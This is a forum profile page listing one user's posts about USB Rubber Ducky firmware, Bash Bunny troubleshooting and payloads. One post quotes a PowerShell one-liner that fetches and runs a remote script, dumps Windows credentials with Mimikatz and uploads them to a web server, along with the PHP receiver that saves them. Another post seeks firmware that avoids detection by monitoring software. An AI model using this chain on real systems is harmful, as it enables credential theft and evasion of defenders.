Jump to content

TeCHemically

Active Members
  • Posts

    131
  • Joined

  • Last visited

Profile Information

  • Gender
    Male

Recent Profile Visitors

2,139 profile views

TeCHemically's Achievements

Newbie

Newbie (1/14)

  1. You were right. That is the one I needed. thanks so much!! 🙂
  2. Thank you for your reply! I believe the v2.1 firmware is a twin duck firmware. I am not able to use a twin duck in this situation. It must not be recognized as a USB drive or it will get noticed by monitoring software. The policies around USB drives are very strict in this client's environment. I need solely HID with no USB storage and with VID/PID changing support. Looks to be a twin duck f/w - UDC_DESC_STORAGE usb_dev_desc_t udc_device_desc; Not sure if I am reading that incorrectly. The source in one other firmware lists mass storage and HID injection in the comments at the top. I am unsure if that will be listed in all. I will try this one in the lab and report back. thanks for your help!
  3. I attempted to flash the 1.0-stable firmware to test; and i am getting this error when I use the flash tool: "Can't load jvm.dll". I have the JDK and JRE path added to PATH; but I also place the jvm.dll file from both the JRE and JDK paths (because I don't know which one I need) in the Duck Programming folder one at a time and tried to run the program.bat <firmware_file>.hex command. I still get the same "Can't load jvm.dll" error. That doesn't seem possible. Tried as user and a CMD window as admin. No change. My java is version 10. Do I need a specific older version? Installed Java JRE_8. This resolved the firmware flashing issue. All I need now is to know which f/w version I need to support vid/pid changing via the online tool kit created BIN file. I confirmed the 1.0-stable f/w does not support changing the VID/PID via the online created vidpid.bin.
  4. I found the other firmware images on the github - https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Firmware/Images Which one do I need to make the above vid/pid change functionality work?
  5. I am adding the vidpid.bin file to my sd card that was created by the online duck tool kit; but the vid / pid are not changed. The only version of the firmware on the hak5 download page is 1.0-stable from 2011. Does this version allow for vid/pid changing via the aforementioned method? Where did all of the other ducky firmware versions go and why aren't they available on the d/l page? I haven't used this ducky in a while; so, I'm a bit rusty. My scripts are working fine; but I do not know how to check what firmware I am on (I only know it is not twin duck). Any guidance on getting this device to change vid/pid according to the bin files i created with teh online duck tool kit would be very helpful. Thanks!
  6. Thanks, yes it definitely is in arming mode; and this bunny came on the 1.3 firmware. I checked it before I ran the updater. The unbricking reset process doesn't work either. It never does anything other than boot into arming mode even after the plug in and unplug 3 times over at the beginning of that process.
  7. Thanks Just_a_User, I tried that and it is still skipping right over the firmware update as before :( I got excited by your response and was super hopeful that would do it. Thanks anyway :)
  8. ok, I am not sure why that formatting issue occurred and why it would not let me just past the text in w/o making it such a mess. Sorry everyone, thanks to any who read it and reply!
  9. I received my replacement bashbunny yesterday and this new one will not perform the firmware update. Here is what I have tried so far: I have the sha checksum verified 1.4 firmware update file on the root of the storage partition and have plugged it into 2 different PCs (one linux and one windows); but it just mounts the storage and boots into arming mode normally. It totally skips the firmware update. I tried the f/w update on a third PC (windows) and it failed to start as well. I even tried the unbricking reset steps provided by Seb. The unbricking reset will not even start. I get no "police" flashing at all. Whenever the bunny is plugged in all it does is mount the storage partition. No reset or firmware update procedures ever begin. I tried to flash the 1.3 firmware as well to make sure it wasn't an issue with the firmware file itself. It just boots normally into arming mode completely bypassing the expected firmware update as it does with the 1.4 version. I also tried running the bunnyupdater version 1.0 and the newer 1.1; no change :(
  10. Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!
  11. I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" Here is the PHP script: <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference): <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Thanks to any who reply!
  12. Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
  13. Well, I have some ok news and some great news guys. Firstly, thanks to all who assisted me in troubleshooting my issues with my bashbunny. The "ok news" is that I am not crazy, or just plain dumb in the head, and the bashbunny that I have is indeed defective. The "great news" is that Hak5, the kind folks that they are, have been able to verify my suspicions and are getting me a replacement device. Seriously, thanks again to all who helped me troubleshoot this device. I am sincerely grateful for all of your time and suggestions. I am looking forward to my bunny's arrival so I can get to work on the new payloads I have cooking up. I think I have a pretty nice recipe brewing here! :)
  14. Thanks for your reply. Yes, I am safely ejecting; and my AV is set to not interact with the drive letters that my externals mount to.
  15. Just tried to run my first payload after the reformat and it failed on the first operation where the payload creates a directory because it says the file system is corrupted. I even got it to unmount successfully after I put the payload on there before I ran it. If I open a powershell window and try to create the directory I get the same error. This is what fails: Q DELAY 6000 Q GUI r Q DELAY 1000 Q STRING POWERSHELL Q ENTER Q DELAY 1500 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 1500 Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\" Q ENTER Q DELAY 1500 Q STRING md \$LOOTDIR2\\ Q ENTER Q DELAY 1000 This is the command that fails: Q STRING md \$LOOTDIR2\\
×
×
  • Create New...